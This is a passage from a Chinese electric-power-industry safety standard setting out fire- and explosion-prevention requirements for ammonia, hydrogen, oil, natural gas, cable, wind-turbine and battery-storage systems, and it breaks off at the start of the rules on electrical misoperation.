善储运等生产设施的安全阀、压力表、放空管、氮气吹扫置换口等安全装置,并 做好日常维护;严禁使用软管卸氨,应采用金属万向管道充装系统卸氨。 1.12.11 加强进入液氨储存区车辆管理,严禁未装阻火器机动车辆进入,运 送物料的机动车辆必须正确行驶。 1.12.12 加强厂外运输液氨车辆管理,不得随意找社会车辆进行液氨运输。 电厂应与具有危险货物运输资质的单位签定专项液氨运输协议。 2 防止火灾事故的重点要求 2.1 加强防火组织与消防设施管理 2.1.1 各单位应落实全员消防安全责任制,建立消防安全保证和监督体系, 制定消防安全制度、消防安全操作规程,制定灭火和应急疏散预案。建立火灾风 险分级管控及火灾隐患排查治理双重预防机制。保障疏散通道、安全出口、消防 车通道畅通。配备消防专责人员,并建立有效的消防组织网络和训练有素的志愿 消防队伍。定期进行全员消防安全培训、 组织有针对性的消防演练和火灾疏散 演习。 2.1.2 配备符合要求的消防设施、消防器材及正压式消防空气呼吸器,灭火 剂的选用应根据灭火的有效性,设备、人身和环境的影响等因素确定。禁止使用 过期和性能不达标消防器材。灭火器最低配置基准、灭火器的设置、灭火器类型、 规格和灭火级别应符合《建筑灭火器配置设计规范》(GB50140)标准。泡沫灭 火器的标志牌应标明“不适用于电气火灾”字样。 2.1.3 单机容量 125MW 机组及以上的燃煤电厂消防给水应采用独立的消防 给水系统,以确保消防水量、水压不受其他系统影响;消防设施的备用电源应由 保安电源供给,未设置保安电源的应按Ⅰ类负荷供电(25MW 及以下的发电厂, 消防水泵应按不低于Ⅱ类负荷供电)。消防水系统应定期检查、维护。正常工作 状态下,应将自动喷水灭火系统、火灾自动报警系统、防烟排烟系统和联动控制 19 的防火卷帘分隔设施设置在自动控制状态。 2.1.4 设置固定式气体灭火系统的发电厂、变电站等场所、长距离电缆隧道、 长距离地下燃料皮带通廊、地下变电站至少配置 2 套正压式消防空气呼吸器,长 距离电缆隧道、长距离地下燃料皮带通廊、地下变电站至少配置 4 只防毒面具。 并应进行使用培训,确保其掌握正确使用方法,以防止人员在灭火中因使用不当 中毒或窒息。正压式空气呼吸器和消防员灭火防护服应每月检查一次。 2.1.5 现场工作人员应掌握《电力设备典型消防规程》动火级别、禁止动火 条件。在一、二级动火区施工、检修现场动火作业时,要做好一般动火安全措施、 组织措施、技术措施,严格执行动火工作票制度。变压器、脱硫塔现场检修工作 期间应有专人防火值班,不得出现现场无人情况。 2.1.6 电力调度大楼、地下变电站、无人值守变电站应安装火灾自动报警或 自动灭火设施,无人值守变电站其火灾报警系统应和视频监控系统联动,以便及 时发现火警。 2.1.7 建(构)筑物的安全疏散安全出口、室外疏散楼梯、疏散通道、疏散 门不得堆积和占用、应保持畅通,疏散设施各项防火参数符合要求。疏散门不许 封堵、上锁。主厂房疏散楼梯间内部不应穿越可燃气体管道,蒸汽管道,甲、乙、 丙类液体的管道和电缆或电缆槽盒。 2.1.8 风电、光伏新能源场站要与当地森林防火指挥中心建立应急协调机制, 根据气候特征,结合森林、草场季节、环境等因素以及山火、林火、草火特点, 适时开展风电、光伏新能源场站及输配电线路火灾隐患排查,并落实防范措施, 最大限度地减少山火、雷击事故造成的损失。 2.1.9 大型发电、变配电等特殊建设工程应履行消防设计审查、消防验收制 度,其他建设工程应履行备案抽查制度;依法应当进行消防验收的建设工程,未 经消防验收或者消防验收不合格的,禁止投入使用;其他建设工程经依法抽查不 合格的,应当停止使用。 2.1.10 定期进行消防设施维护保养检测;消防设施维护保养检测、消防安全 评估等消防技术服务机构及人员应符合从业条件和资格,并对服务质量负责。 2.1.11 推广应用电力设备消防新产品、新技术。消防新产品、新技术应按有 关规定通过型式检验、技术鉴定、专家评审、验收,并提供相应报告或记录。 20 2.1.12 进入氢站、油库、氨区和天然气站前进行静电释放,严禁携带手机、 火种,严禁穿带钉子的鞋和易产生静电的衣服,运行和维护应使用铜质的专用工 具。 2.2 防止发电厂电缆着火事故 2.2.1 新、扩建工程中的电缆选择与敷设应按有关规定进行设计。电缆通道 的防火设施必须与主体工程同时设计、同时施工、同时验收。 2.2.2 在密集敷设电缆的主控制室下电缆夹层和电缆沟内,不得布置热力管 道、油气管以及其它可能引起着火的管道和设备。 2.2.3 对于新建、扩建的火电厂主厂房、升压站、输煤、燃油、制氢、氨区 及其它易燃易爆场所,应选用阻燃电缆。 2.2.4 采用排管、电缆沟、隧道、桥梁及桥架敷设的阻燃电缆,其成束阻燃 性能应不低于 C 级。与电力电缆同通道敷设的控制电缆、非阻燃通信光缆等应 分层敷设并采取防火隔离措施。110(66)kV 及以上电压等级电缆在隧道、电缆 沟、变电站内、桥梁内应选用阻燃电缆,其成束阻燃性能应不低于 C 级。 2.2.5 严格按正确的设计图册施工,做到布线整齐,同一通道内电缆数量较 多时,若在同一侧的多层支架上敷设,应按电压等级由高至低的电力电缆、强电 至弱电的控制和信号电缆、通讯电缆“由上而下”的顺序排列;当水平通道中含有 35kV 以上高压电缆,或为满足引入柜盘的电缆符合允许弯曲半径要求时,应按 “由下而上”的顺序排列。同一重要回路的工作与备用电缆应配置在不同层或不同 侧的支架上,并应实行防火分隔。电缆在任何敷设方式及其全部路径条件的上下 左右改变部位,均应满足电缆允许弯曲半径要求,并应符合电缆绝缘及其构造特 性的要求,避免任意交叉并留出足够的人行通道。 2.2.6 发电厂控制室、开关室、计算机室等通往电缆夹层、隧道、穿越楼板、 墙壁、柜、盘等处的所有电缆孔洞和盘面之间的缝隙(含电缆穿墙套管与电缆之 问缝隙)必须采用合格的不燃或阻燃材料封堵。防火封堵组件的耐火极限不应低 于被贯穿物的耐火极限,且不低于 1.00h。 2.2.7 非直埋电缆接头的外护层及接地线应包覆阻燃材料,充油电缆接头及 敷设密集的 10~35kV 电缆的接头应用耐火防爆槽盒封闭。密集区域(4 回及以上) 的 110(66)kV 及以上电压等级电缆接头应选用防火槽盒、防火隔板、防火毯、 21 防爆壳等防火防爆隔离措施。 2.2.8 新建或改扩建工程,发电厂的发电机、主变压器、备用变压器、消防 水泵、消防系统回路、应急电源、断路器及重要公用设备的保护、控制等回路, 应使用耐火电缆。水电厂(含抽水蓄能电厂)消防电梯、消防系统回路,应急电 源、断路器、灭磁开关等直流操作电源回路,以及发电机组紧急停机、进水口快 速闸门或阀门紧急闭门的直流电源等重要回路,计算机监控、双重化继电保护的 电源回路,应使用耐火电缆。 2.2.9 电缆竖井和电缆沟应分段做防火隔离,对敷设在隧道和主控室或厂房 内构架上的电缆要采取分段阻燃措施。 2.2.10 尽量减少电缆中间接头的数量。如需要,应按工艺要求制作安装电缆 头,经质量验收合格后,再用防火或防爆措施将其封闭。变电站夹层内 3kV 以 上在运中间接头应逐步移出,电力电缆切改或故障抢修时,应将 3kV 以上中间 接头布置在站外的电缆通道内。 2.2.11 在电缆通道、夹层内动火作业应办理动火工作票,并采取可靠的防火 措施。在电缆通道、夹层内使用的临时电源应满足绝缘、防火、防潮要求。工作 人员撤离时应立即断开电源。 2.2.12 火力发电厂主厂房到网络控制楼或主控制楼的每条电缆隧道或沟道 所容纳的电缆回路,宜不超过 1 台机组的电缆。 2.2.13 建立健全电缆维护、检查及防火、报警等各项规章制度。严格按照规 程规定对电缆夹层、通道进行定期巡检,并检测电缆和附件关键部位运行温度, 多条并联的电缆应分别进行测量。 2.2.14 电缆通道、夹层应保持清洁,禁止堆放杂物,照明应充足,并有防火、 防水、通风的措施。电缆通道沿线及其内部、隧道通风口(亭)外部不得积存易 燃、易爆物。火电厂锅炉、燃煤贮运车间内架空电缆上及附近电气设备控制箱内 的积灰应定期清扫。 2.2.15 近高温管道、阀门等热体的电缆应有隔热措施,靠近充油设备的电缆 沟,靠近充油设备的电缆沟,应设有防火延燃措施,盖板应封堵。 2.2.16 发电厂主厂房内架空电缆与热体管路平行时应保持足够的距离,控制 电缆不小于 0.5m,动力电缆不小于 1m。控制电缆、动力电缆与热力管道交叉时, 22 两者距离分别不应小于 0.25m 及 0.5m。当不能满足要求时,应采取有效的防火 隔热措施。 2.2.17 电缆通道临近易燃或腐蚀性介质的存储容器、输送管道时,应加强监 视或采取安全隔离措施,防止易燃或腐蚀性介质渗漏进入电缆通道损害电缆或导 致火灾。 2.2.18 3~66kV 中性点不接地系统发生单相接地故障时,一次设备应能快速 响应,防止电缆着火、事故扩大。变电站 3~66kV 各段母线,因地制宜配置主动 干预型消弧装置。 2.2.19 重要的电缆通道如控制电缆安装密集的电缆夹层、电缆竖井、电缆桥 架、电缆沟区域内应安装火灾探测报警装置,并定期检测。新建场站和重要负荷 的交流电源回路,在发生绝缘损坏时,接地故障产生的接地电弧,可能引起火灾 危险时宜设置剩余电流监测电器。 2.3 防止汽机油系统着火事故 2.3.1 油系统应尽量避免使用法兰连接,禁止使用铸铁阀门。 2.3.2 油系统法兰禁止使用塑料垫、橡皮垫(含耐油橡皮垫)和石棉纸垫, 应按磷酸酯抗燃油及矿物油对密封材料的相容性要求进行选择。 2.3.3 油管道法兰、阀门及可能漏油部位附近不准有明火,必须明火作业时 要采取有效措施,附近的热力管道或其它热体的保温应紧固完整,并包好铁皮。 2.3.4 禁止在有介质的油管道上进行切割、焊接工作。在无介质的油管上进 行切割、焊接时,必须事先将管子冲洗、吹扫干净,办理一级动火工作票,并对 可燃气体检测合格后,方可进行动火作业。 2.3.5 油管道法兰、阀门及轴承、调速系统等应保持严密不漏油,如有漏油 应及时消除,严禁漏油渗透至下部蒸汽管、阀保温层。对油管道上的焊口、弯头 及接头部位,结合机组检修进行无损检测抽检,发现问题进行更换处理并扩大抽 检范围。 2.3.6 油管道法兰、阀门的周围及下方,如敷设有热力管道或其它热体,这 些热体保温必须齐全,保温外面应包铁皮等金属外保护层。 2.3.7 检修时如发现保温材料内有渗油时,应查明原因,消除漏油点,并更 换保温材料。 23 2.3.8 事故排油阀应设两个串联钢质截止阀,其操作手轮应设在距油箱 5m 以外的地方,便于操作和撤离,有两个以上通道且能保证漏油着火时人员可以到 达,操作手轮不允许加锁或摘除手轮,应挂有明显的“禁止操作”标志牌。 2.3.9 油管道要保证机组在各种运行工况下自由膨胀,应定期检查和维修油 管道支吊架。定期检查油管道有无碰摩,发生碰摩应及时设法消除;油管道穿过 楼板、孔洞等构筑物时,留在孔洞内管道不得有法兰、焊口,且应设有橡胶套管 等防碰摩措施。 2.3.10 机组油系统的设备及管道损坏发生漏油,除轻微渗油可以及时处理 外,凡不能与系统隔绝处理且无法现场消除漏油的,或热力管道保温已渗入油且 无法妥善处置的,应立即停机处理。 2.4 防止燃油罐区及锅炉油系统着火事故 2.4.1 油系统应使用铜制工具或专用防爆工具操作,禁止在油管道上进行焊 接、捻缝工作。 2.4.2 储油罐或油箱的加热温度必须根据燃油种类严格控制在允许的范围 内,加热燃油的蒸汽温度,应低于油品的自燃点。 2.4.3 油区、输卸油管道应有可靠的防静电安全接地装置,油区应设置可靠 地防雷接地装置,并定期测试接地电阻值。 2.4.4 油区、油库必须有严格的消防管理制度。在相关设施、设备上,设置 明显的消防安全警示标志。油区内明火作业时,必须办理一级动火工作票,并应 有可靠的安全措施。 2.4.5 油区内易着火的临时建筑要拆除,禁止存放易燃物品和堆放杂物,无 杂草。 2.4.6 燃油罐区及锅炉油系统的防火还应遵守 2.3.4、2.3.6、2.3.7 的规定。 2.4.7 燃油系统的软管和垫片,应定期检查更换。 2.4.8 油库、油罐降温装置要进行定期维护和试运,保持完整备用。 2.5 防止制粉系统爆炸事故 2.5.1 不得用压力水管直接浇着火的煤粉,以防煤粉飞扬引起爆炸,不准在 运行中的制粉设备上进行焊接工作。 2.5.2 及时消除漏粉点,清除漏出的煤粉。清理煤粉时,应杜绝明火。 24 2.5.3 严格控制磨煤机出口温度和煤粉仓温度,其温度不得超过煤种要求的 规定。磨制混合品种燃料时,出口温度应按其中最易爆的煤种确定。 2.5.4 防爆门动作时喷出的气流,不应危及附近的电缆、油气管道和有人通 行的部位。 2.5.5 制粉系统的设备保温材料、管道保温材料及在煤仓间穿过的汽、水、 油管道保温材料均应采用不燃烧材料。 2.5.6 制粉系统动火作业,应测定粉尘浓度合格,并执行动火工作制度。 2.6 防止氢气系统爆炸事故 2.6.1 当发电机为氢气冷却运行时,置换空气的管路必须隔绝,并加严密的 堵板。制氢和供氢的管道、阀门或其他设备发生冻结时,应用蒸汽或热水解冻, 禁止用火烤。 2.6.2 氢冷系统中氢气纯度须不低于 96%,含氧量不应大于 1.2%;制氢设备 中,气体含氢量不应低于 99.5%,含氧量不应超过 0.5%。如不能达到标准,应 立即进行处理,直到合格为止。 2.6.3 在氢站或氢气系统附近进行明火作业或做能产生火花的工作时,应测 定工作区域内氢气含量合格,执行动火工作制度,并应办理一级动火工作票。作 业时必须使用不产生火花的工具。 2.6.4 氢站应按严重危险级的场所管理,应设推车式灭火器。 2.6.5 密封油系统平衡阀、压差阀、安全阀及浮球阀必须保证动作灵活、可 靠,密封瓦间隙必须调整合格。 2.6.6 空、氢侧各种备用密封油泵应定期进行联动试验。 2.6.7 室内氢气排放管的出口应高出屋顶 2m 以上。室外设备的氢气排放管 应高于附近有人员作业的最高设备 2m 以上。氢气排放管应设置静电接地,并在 避雷保护范围之内。氢管道应有防静电的接地措施,管道法兰、阀门等连接处, 应采用金属线跨接。 2.6.8 首次使用和检修、改造后的氢气系统应进行耐压、清洗(吹扫)和气 密性试验,符合要求后方可投入使用。 2.7 防止输煤皮带着火事故 2.7.1 输煤皮带停止上煤期间,也应坚持巡视检查,发现积煤、积粉应及时 25 清理。 2.7.2 煤垛发生自燃现象时应及时扑灭,不得将带有火种的煤送入输煤皮带。 2.7.3 燃用易自燃煤种的电厂必须采用阻燃输煤皮带。 2.7.4 应经常清扫输煤系统主辅助设备,重点是电源箱柜、电缆排架、电缆 槽盒、电缆竖井、除尘器管路、落煤管、导煤槽内等各处的积粉。 2.8 防止脱硫、湿除系统着火事故 2.8.1 脱硫、湿式电除尘器系统防腐材料应当天配置,即配即用,非工作期 间分类存放在专用仓库内。严禁在吸收塔、烟道、湿式除尘器内及其他防腐区域 堆积防腐材料。专用仓库应单独隔离并距离其他建(构)筑物不小于 25m。严禁 在防腐材料仓库周围 10m 范围内焊接、切割或进行其他热处理作业。装过挥发 性油剂及其他易燃物质的容器,应及时清理处置,粘有油漆的棉纱、破布及油纸 等易燃废物,应及时回收处理。 2.8.2 在涉及衬胶、环氧树脂、玻璃鳞片、喷涂聚脲、FRP 玻璃钢的设备内 部或外壁进行焊接、切割、打磨等可能产生明火的作业或其他加热作业,必须严 格执行动火工作票制度。吸收塔、湿式电除尘器及相关烟道内动火作业只能单点 作业,焊割作业应采取间歇性工作方式。 2.8.3 涉及脱硫塔、湿式电除尘器以及相关烟道内部防腐、非金属部件安装 区域,必须制定施工区域出入门禁制度,所有人员凭证出入并登记,交出火种, 关闭随身携带的无线通信设备,禁止穿钉有铁掌的鞋和容易产生静电火花的化纤 服装。 2.8.4 脱硫、湿式电除尘器系统及附属烟道内防腐、安装或检修必须选用防 爆型电器设备和电动工具,并安装漏电保护器,电源线必须使用软橡胶电缆,且 不允许有接头。塔、罐及烟道行灯电压不得超过 12V,不得使用自耦变压器。严 禁将行灯照明的隔离变压器带进金属容器、金属管道或密闭容器内使用。灯具与 内部防腐涂层及除雾器、湿式除尘器阳极模块的距离应大于 1.0m。 2.8.5 脱硫、湿式电除尘器系统及内部防腐及非金属部件安装作业期间,应 至少设置 2 台防爆型排风机进行强制通风,并配备足够的消防灭火设施,周围 10 米范围及其上下空间内严禁动火。禁止在与防腐、非金属部件安装作业面相 通的其他设备、烟道、管道内部和外壁进行焊接、切割、打磨等可能产生明火的 26 作业。防腐施工面积在 10m2 以上时,防腐现场应接引消防水带,并保证消防水 随时可用。与非金属部件胶合黏结采用加热保温方法促进固化时,严禁使用明火。 禁止在塔、箱、罐及烟道等有限空间内进行防腐鳞片涂料稀释或搅拌作业。进行 吸收塔、湿式电除尘器和烟道内部防腐、安装施工时,应至少保留 2 个有限空间 出入孔,并保持逃生通道畅通。 2.8.6 湿式电除尘器本体四周应配备消防设施,灭火范围应能够覆盖最顶层 平台设备。阳极上方须设置全覆盖事故喷淋系统。电场启动前和停运后必须进行 冲洗,未经冲洗不得启动。严禁湿式电除尘器未通烟气空载运行,锅炉 MFT 动 作应立即联锁停运湿式电除尘器并启动冲洗系统。空载升压试验须履行规定的许 可手续,相关管理和专业人员须到场监督指导,消防人员做好现场监护和消防应 急准备。空载升压必须在风机运行的条件下进行,空载升压前、后必须对电场进 行冲洗,空载升压二次电压最大值不得超过设计值。 2.8.7 应编制并落实脱硫系统、湿式电除尘器系统施工临时设施的消防设计, 满足施工现场防火、灭火及人员安全疏散的要求,并对各级施工人员进行安全交 底。应制定脱硫系统、湿式电除尘器系统施工专项应急预案和现场处置方案,建 立应急救援队伍,配备应急救援物资,开展应急演练,并对演练效果进行评估。 2.9 防止氨系统着火爆炸事故 2.9.1 健全和完善氨系统运行与维护规程以及相关的制度、措施。 2.9.2 氨区及输氨管道法兰、阀门连接处应装设金属跨接线。与储罐相连的 管道、阀门、法兰、仪表等材料选择符合要求,并具有防腐蚀措施。 2.9.3 氨区所有电气设备、远传仪表、执行机构、热控盘柜应使用防爆型电 器设备,且通风、照明良好。 2.9.4 液氨设备、系统的布置应便于操作、通风和事故处理,同时必须留有 足够宽度的操作空间和安全疏散通道。 2.9.5 在正常运行中会产生火花的氨压缩机启动控制设备、氨泵及空气冷却 器(冷风机)等动力装置的启动控制设备不应布置在氨压缩机房中。温度遥测、 记录仪表等不应布置在氨压缩机房内。 2.9.6 在氨区或氨系统附近进行明火作业时,必须严格执行动火工作票制度, 氨区内动火必须办理一级动火工作票,氨区内严禁明火采暖。氨系统动火作业前、 27 后应置换排放合格;动火结束后,及时清理火种。 2.9.7 氨储罐区及使用场所,应按规定配备消防灭火和稀释吸收的喷淋系统 以及足够的消防器材、氨漏泄检测器和视频监控系统,并按时检查和试验。 2.9.8 氨储罐的新建、改建和扩建工程项目应进行安全性评价,其防火、防 爆设施应与主体工程同时设计、同时施工、同时验收投产。 2.9.9 氨区按规定设置避雷保护装置,储罐和氨管道可靠接地,并采取防止 静电感应的措施。 2.9.10 氨区储罐应设置防晒和温度升高的降温喷淋措施,具有自动启动功能 并定期试验。 2.9.11 卸氨区应装设万向充装系统用于接卸液氨,禁止使用软管接卸。万向 充装系统应使用干式快装接头,周围设置防撞设施。 2.10 防止天然气系统着火爆炸事故 2.10.1 燃气轮机(房)或联合循环发电机组(房)、余热锅炉(房)与办公、 生活建筑(耐火等级一、二级)之间的防火间距应大于 10m,与办公、生活建筑 (耐火等级三级)之间的防火间距应大于 12m,天然气调压站与办公、生活建筑 之间的防火间距应大于 25m。 2.10.2 天然气系统的新建、改建和扩建工程项目应进行安全评价,其防火、 防爆设施应与主体工程同时设计、同时施工、同时验收投产。 2.10.3 天然气系统区域应建立严格的防火防爆制度,生产区与办公区应有明 显的分界标志,并设有“严禁烟火”等醒目的防火标志。 2.10.4 室内天然气调压站,燃气轮机与联合循环发电机组厂房应设可燃气体 漏泄探测装置,其报警信号应引至集中火灾报警控制器。 2.10.5 应定期对天然气系统进行火灾、爆炸风险评估,对可能出现的危险及 影响应制定和落实风险削减措施,并应有完善的防火、防爆应急救援预案。 2.10.6 天然气系统的压力容器使用管理应按《特种设备安全监察条例》的规 定执行。 2.10.7 天然气系统中设置的安全阀,应做到启闭灵敏,每年至少委托有资格 的检验机构检验、校验一次。压力表等其它安全附件应按其规定的检验周期定期 进行校验。 28 2.10.8 在天然气管道中心线两侧各五米地域范围内,禁止种植乔木、灌木、 藤类、芦苇、竹子或者其他根系达管道埋设部位可能损坏管道防腐层的深根植物; 禁止取土、采石、用火、堆放重物、排放腐蚀性物质、使用机械工具进行挖掘施 工;禁止挖塘、修渠、修晒场、修建水产养殖场、建温室、建家畜棚圈、建房以 及修建其他建筑物、构筑物。 2.10.9 天然气爆炸危险区域内的设施应采用防爆电器,其选型、安装和电气 线路的布置应按《爆炸和火灾危险环境电力装置设计规范》(GB 50058)执行。 2.10.10 天然气区域应有防止静电荷产生和集聚的措施,并设有可靠的防静 电接地装置。 2.10.11 天然气区域的设施应有可靠的防雷装置,防雷(静电)接地,接地 电阻不应大于 10Ω;防雷(静电)检测每年应进行两次(其中在雷雨季节前监测 一次)。 2.10.12 连接管道的法兰连接处,应设金属跨接线(绝缘管道除外),当法 兰用五根以上的螺栓连接时,法兰可不用金属线跨接,但必须构成电气通路。 2.10.13 在天然气易燃易爆区域内进行作业时,应使用防爆工具,并穿戴防 静电服和不带铁掌的工鞋。禁止使用手机等非防爆通信工具。 2.10.14 机动车辆进入天然气系统区域,排气管应带阻火器。 2.10.15 天然气区域内不应使用汽油、轻质油、苯类溶剂等擦地面、设备和 衣物。 2.10.16 天然气区域需要进行动火、动土、进入有限空间等特殊作业时,应 按照作业许可的规定,办理作业许可。 2.10.17 天然气区域应做到无油污、无杂草、无易燃易爆物,生产设施做到 不漏油、不漏气、不漏电、不漏火。 2.10.18 应配置专职的消防队(站)人员、车辆和装备,并符合国家和行业 的标准要求,或与距离较近的国家综合性消防救援队形成联动机制,制定灭火救 援预案,定期联合演练。 2.10.19 发生火灾、爆炸后,火场指挥部应立即采取安全警戒措施,并根据 现场是否有继续扩大蔓延的态势以及产生次生灾害的情况,果断下达撤退命令, 在确保人员、设备、物资安全的前提下,采取相应的措施。 29 2.10.20 燃气轮机天然气系统厂房如汽机房、燃机房、集中控制室、启动锅 炉房、天然气增压站等,建筑物耐火等级应达到二级,外墙保温材料及屋面板应 采用不燃性材料,屋面防水层应采用不燃、难燃材质。 2.10.21 燃气轮机天然气系统停气进行动火作业前,应按规定对作业管段或 设备进行系统隔离及置换。置换应采用间接置换法。 2.10.22 燃气轮机天然气系统各过滤器及与过滤器相连的取样管、放空管、 排污管等管道在进行动火作业前,必须确认动火管段与过滤器之间有可靠物理隔 离或封堵;过滤器设备本体进行动火作业前,必须将滤芯拆除并清理干净罐体内 部;排污管进行动火作业前管道内部必须清理干净。现场工作应使用铜质工具。 2.11 防止风力发电机组着火事故 2.11.1 建立健全预防风力发电机组(以下简称风机)火灾的管理制度,严格 风机内动火作业管理,定期巡视检查风机防火控制措施。 2.11.2 风电机组机舱、塔筒内母排、并网接触器、励磁接触器、变频器、变 压器等一次设备动力电缆必须选用阻燃电缆,机舱至塔基电缆应采取分段阻燃措 施。靠近加热器等热源的电缆应有隔热措施,靠近带油设备的电缆槽盒密封。机 舱通往塔筒穿越平台、柜、盘等处电缆孔洞和盘面缝隙应采用有效的封堵措施且 涂刷电缆防火涂料。 2.11.3 严格监控设备轴承、发电机、齿轮箱及机舱内环境温度变化,发现异 常及时处理。发电机轴承温度报警值不超过 85℃,停机温度不超过 95℃。定期 清理主轴下部接油盒内废油。严禁用火把或喷灯拆卸或安装轴承。 2.11.4 母排、并网接触器、励磁接触器、变频器、变压器等一次设备动力电 缆,定期用红外测温或使用测温贴对电缆温度进行监视,电缆损坏时及时更换阻 燃电缆。机组塔筒内电缆穿越的孔洞应用耐火极限不低于 1h 的不燃材料进行封 堵。 2.11.5 风机机舱、塔筒内的电气设备及防雷设施的预防性试验合格,并每季 度检查机组防雷接地回路的电涌保护器、接地引下线、旋转导电单元等部件是否 工作可靠,连接正常。每年应测量一次防雷系统接地电阻,单机工频接地电阻应 不大于 4Ω。每年检测接闪器至塔筒底部接地扁钢引雷通道电气连接性能,每一 连接点的过渡电阻应不大于 0.24Ω。 30 2.11.6 风机机舱的齿轮油及液压油系统应严密、无渗漏,应采用不易燃烧或 燃点(闪点)高于风电机组运行最高温度的油品。法兰不得使用铸铁材料、不得 使用塑料垫、橡胶垫(含耐油橡胶垫)和石棉纸、钢纸垫,刹车系统必须采取对 火花或高温碎屑封闭隔离的措施。 2.11.7 机组内严禁存放易燃物品,机舱内保温材料必须用阻燃材料。并应配 置自动消防系统,至少包含探测器、火灾报警装置、灭火装置、控制器、通信设 备等,应具有智能防护、自动控制功能,并且可与风机主控系统协调联动;检修 期间机舱内应配置不低于 2 个呼吸器用于紧急逃生;机组机舱、塔内底部及机舱 下第一个平台应摆设合格消防器材;在检修作业和动火作业时,应在作业平台配 备合格消防器材后方可进行作业。 2.11.8 风机机舱末端有紧急逃生孔及逃生绳悬挂点,配备紧急逃生装置,且 定期检验合格,保证人员逃逸或施救安全。塔筒的醒目部位必须悬挂安全警示牌。 2.11.9 风机塔筒内的动火作业必须开具动火作业票,作业前消除动火区域内 可燃物。氧气瓶、乙炔气瓶应摆放、固定在塔筒外,气瓶间距不得小于 5m,不 得爆晒。电焊机电源应取自塔筒外,不得将电焊机放在塔筒内,严禁在机舱内油 管道上进行焊接作业,作业场所保持良好通风和照明。动火结束后清理火种。 2.11.10 进入风机机舱、塔筒内,严禁带火种、严禁吸烟,不得存放易燃品。 清洗、擦拭设备时,必须使用非易燃清洗剂。严禁使用汽油、酒精等易燃物。 2.11.11 布置在风机内(含塔架与机舱)的变压器应采用干式变压器,应布 置于独立的隔离室内并配置自动灭火装置,设置耐火隔板,耐火隔板的耐火极限 不小于 1h。塔架外独立布置的机组变压器与塔架之间的距离不应小于 10m,当 小于 10m 时应选用干式变压器或在变压器与塔架之间增设防火墙,并且变压器 与塔架之间最小间距不得低于 5m;对于贴挂在塔架外壁的机组变压器,应选用 干式变压器并配置自动灭火装置。 2.11.12 风电机组的机舱及机舱平台底板下部、轮毂、塔架底部设备层、各 类电气柜应设应配置自动灭火装置;风机机舱大空间灭火介质应选用新型气溶胶 或超细干粉,电气控制柜、变流器柜等局部小空间应采用新型气溶胶,新型气溶 胶喷口温度均应大于 200℃,且配置的灭火介质需经消防产品质量监督检测中心 测试及认证。 31 2.11.13 定期对控制柜内元器件及接线情况进行检查,保证元件工作可靠, 电缆连接无松动、过热和老化现象。定期检查、清扫发电机集电环碳粉,及时更 换磨损超标超限的碳刷,防止污闪及环火。定期检查并统计机组并网断路器动作 次数,动作次数或使用年限达到设计寿命的应进行更换。 2.11.14 风电机组高速轴刹车系统应采用钢质材料的防护罩,其厚度应不小 于 2mm。定期对刹车时间、刹车间隙、刹车油泵的自动启动进行测试,不满足 要求的禁止机组投运。定期检查刹车盘和制动钳的间隙,刹车盘厚度磨损量超过 3mm 时必须更换,及时清理刹车盘油污。定期检查检查制动钳的释放灵活性, 不满足要求时应及时更换。 2.12 防止电化学储能电站火灾事故 2.12.1 发电侧和电网侧电化学储能电站(以下简称“储能电站”)站址不应 贴邻或设置在生产、储存、经营易燃易爆危险品的场所,不应设置在具有粉尘、 腐蚀性气体的场所,不应设置在重要架空电力线路保护区内;当设置在发电厂、 变电站内时,电池设备室与其它电力设施的安全距离应符合《电化学储能电站设 计规范》(GB 51048)等技术标准的相关规定。 2.12.2 中大型储能电站应选用技术成熟、安全性能高的电池,审慎选用梯次 利用动力电池。当选用梯次利用动力电池时,应遵循全生命周期理念,进行一致 性筛选并结合溯源数据进行安全评估,符合《电力储能用锂离子电池》(GB/T 36276)等技术标准中关于安全性能的要求;运行中,应实时监测电池性能参数, 及时进行一致性管控。 2.12.3 储能电站锂离子电池设备间不得设置在人员密集场所。锂离子电池设 备间的布置应符合《电化学储能电站设计规范》(GB 51048)等技术标准的相 关规定。 2.12.4 储能单元直流回路、电池簇回路应配置直流开断设备,电池模块端子 应具备结构性防反接功能。电池管理系统应具备过压、欠压、压差、过流等电量 保护功能和过温、温差等非电量保护功能,宜具备簇级隔离控制功能,能发出分 级告警信号或跳闸指令,实现就地故障隔离。 2.12.5 磷酸铁锂电池设备间内应设置可燃气体探测装置,当 H2 或 CO 浓度 大于设定的阈值时,应联动断开设备间级和簇级直流开断设备,联动启动事故通 32 风系统和报警装置。可燃气体探测装置阈值的设定应满足相关标准的要求。通风 系统应采用防爆型,启动时每分钟排风量不小于设备间容积(可按照扣除电池等 设备体积后的净空间计算),合理设置进风口、排风口位置,保证上下层不同密 度可燃气体及时排出室外,严禁产生气流短路。正常运行时,通风系统应处于自 动运行状态。 2.12.6 铅酸/铅炭、液流电池室内应设置可燃气体探测装置,联动启动通风 系统和报警装置。通风系统的设计应符合《电力系统用固定型铅酸蓄电池安全运 行使用技术规范》(NB/T 42083)、《全钒液流电池 安全要求》(GB/T 34866) 等技术标准的相关规定。 2.12.7 储能电站电气设备间应设置火灾自动报警系统。新(改、扩)建中大 型锂离子电池储能电站电池设备间内应设置固定自动灭火系统;灭火系统应满足 扑灭电池明火且不复燃的要求,系统类型、流量、压力、喷头布置方式等技术参 数应经具有相应资质的机构实施模块级电池实体火灾模拟试验验证。 2.12.8 储能电站的设备间、隔墙、隔板等管线开孔部位和电缆进出口应采用 防火封堵材料封堵严密。设备间(舱)的通风口、孔洞、门、电缆沟等与室外相 通部位,应设置防止雨雪、风沙、小动物进入的设施。 2.12.9 储能电站运维单位应制定消防设施运行操作规程,定期开展维护保 养,每年至少进行一次全面检测,确保消防设施处于正常工作状态。投运前,运 维单位应针对可能存在的电池热失控、火灾等紧急情况编制应急预案,与属地消 防救援机构建立协同机制,定期开展演练。运维人员应经消防培训合格后方可上 岗。 3 防止电气误操作事故的重点要求 3.1 防误操作技术措施 3.1.1 防止电气误操作的“五防”功能除“防止误分、误合断路器”可采取 提示性措施以外,其余“四防”功能必须采取强制性防止电气误操作措施。 强制性防止电气误操作是指在设备的电动操作控制回路中串联受闭锁回路 控制的接点,在设备的手动操控部件上加装受闭锁回路控制的锁具,严禁出现走 空程序。 33 3.1.2 防误闭锁装置应简单、可靠,操作和维护方便。不得影响继电保护和 自动化系统等设备正常运行。 3.1.3 采用计算机监控系统时,远方、就地操作均应具备防止误操作闭锁功 能。监控防误系统应具有完善的全站性防误闭锁功能,应满足相关标准的要求。 3.1.4 断路器、隔离开关和接地开关电气防误闭锁回路应直接用断路器、隔 离开关和接地开关的辅助触点,不应经重动继电器类元器件重动后接入;操作断 